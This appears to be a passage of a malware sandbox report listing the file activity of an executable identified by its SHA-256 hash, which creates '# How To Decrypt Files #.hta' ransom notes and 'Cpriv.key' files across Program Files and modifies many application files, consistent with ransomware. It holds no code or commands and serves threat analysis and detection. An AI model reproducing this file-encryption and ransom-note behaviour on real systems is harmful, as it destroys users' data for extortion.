Office\CLIPART\PUB60COR\J0287020.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATERMAR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0215086.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\XML Files\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086432.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\PersonalMonthlyBudget.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\bin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00943_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\AdjacencyReport.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02413_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB4.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\_platform_specific\win_x64\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301480.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\navBack.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-border.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\TAB_OFF.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00139_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\BTOPENWORLD.COM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Visualizer.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.es de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\WATER\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03451_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7wre_en.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Outlook.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\zh-TW.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\BORDERS\MSART15.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0196164.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107134.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME24.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\AXIS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESNS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105320.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Hierarchy.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01242_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7ES.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-templates.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21301_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SAVE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18232_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00166_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\SATIN.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_performance_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02262_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Versions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\resources.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14794_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\FAX\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-actions.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUPINST.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02390_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGN98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HM00005_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows NT\Accessories\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01923_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195812.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GROOVE_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\el.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip 